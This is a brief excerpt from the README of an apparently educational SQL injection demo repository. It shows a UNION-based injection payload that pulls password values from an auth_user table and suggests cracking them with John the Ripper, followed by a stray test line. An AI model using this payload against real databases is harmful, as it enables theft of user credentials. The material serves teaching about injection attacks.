LogstonEducation/sql-injection-attack-demo/README.md

    1. `SELECT name FROM orders_item WHERE name LIKE '%z' UNION SELECT password FROM auth_user WHERE first_name LIKE '%'`

 Now we can take these and pass them to a password cracker like [JTR](https://en.wikipedia.org/wiki/John_the_Ripper).

+adding a test line just for learning purposes.